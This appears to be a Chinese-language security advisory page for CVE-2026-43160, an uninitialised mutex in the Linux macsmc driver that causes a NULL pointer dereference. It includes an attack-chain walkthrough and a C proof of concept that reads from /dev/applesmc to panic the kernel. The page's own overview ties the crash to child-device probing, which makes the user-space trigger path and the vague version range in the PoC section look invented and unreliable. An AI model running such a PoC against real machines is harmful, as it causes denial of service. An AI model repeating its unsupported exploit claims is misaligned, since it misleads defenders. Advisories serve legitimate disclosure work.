CVE-2026-43160 CVSS 5.5 中危

CVE-2026-43160 Linux内核macsmc互斥锁未初始化漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43160

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的mfd: macsmc驱动组件中存在一个初始化缺陷漏洞。该问题的根本原因是在apple_smc_probe()函数执行期间，未能正确初始化apple_smc结构体中的互斥锁。这种未初始化的状态导致在子设备的探测函数调用apple_smc_read()时，会间歇性地触发空指针解引用错误。尽管该问题看起来影响有限，但本地低权限攻击者可能利用此漏洞破坏内核稳定性，导致系统崩溃或拒绝服务，从而严重影响系统的可用性。

技术细节

该漏洞技术根源在于Linux内核驱动程序的开发逻辑错误。在macsmc驱动加载过程中，probe函数负责分配资源并初始化设备结构体，但遗漏了对mutex成员的mutex_init()调用。互斥锁是内核中用于保护临界区资源同步的重要机制，未初始化的互斥锁其内部指针（如wait_lock）可能为NULL或指向无效内存。当子设备初始化或用户态程序通过sysfs/设备接口发起读取请求时，会调用apple_smc_read函数，该函数尝试获取互斥锁（mutex_lock）。由于锁未初始化，内核在访问锁结构体内部字段时会触发空指针解引用异常。虽然CVSS向量显示机密性和完整性未受影响，但该异常会导致内核崩溃（Kernel Panic），从而使系统完全不可用。

攻击链分析

STEP 1

步骤1

攻击者获得目标Linux系统的本地低权限用户访问权限。

STEP 2

步骤2

攻击者识别系统中存在未修复的macsmc驱动程序，并找到对应的设备接口（如/dev/applesmc）。

STEP 3

步骤3

攻击者执行恶意程序或命令，对设备接口执行读取操作，触发驱动中的apple_smc_read函数。

STEP 4

步骤4

apple_smc_read尝试获取未初始化的互斥锁，导致内核发生空指针解引用错误。

STEP 5

步骤5

系统触发内核恐慌（Kernel Panic）或崩溃，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43160
 * Trigger: Local read operation on the affected device
 * Result: Kernel NULL pointer dereference / Panic
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

#define DEVICE_PATH "/dev/applesmc"

int main() {
    int fd;
    char buffer[128];
    ssize_t bytes_read;

    printf("[+] Attempting to trigger CVE-2026-43160...");

    // Open the device node associated with the vulnerable driver
    fd = open(DEVICE_PATH, O_RDONLY);
    if (fd < 0) {
        perror("[-] Failed to open device");
        return 1;
    }

    printf("[+] Device opened. Triggering read...");

    // Attempt to read from the device.
    // This path leads to apple_smc_read() -> mutex_lock(&smc->lock)
    // Since the mutex was not initialized in apple_smc_probe(),
    // this triggers a NULL pointer dereference.
    bytes_read = read(fd, buffer, sizeof(buffer));
    
    if (bytes_read < 0) {
        perror("read");
    } else {
        printf("[+] Read succeeded (unexpected, vulnerability might not be triggered or patched)");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel < 6.x (specific commits 2d59325, 414f65d, a1e9e29)

防御指南

临时缓解措施

建议立即应用官方发布的内核补丁。在无法立即重启升级的情况下，可以通过禁用相关的macsmc驱动模块（如果编译为模块）来暂时规避风险，并严格控制系统本地用户的权限，防止恶意触发。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表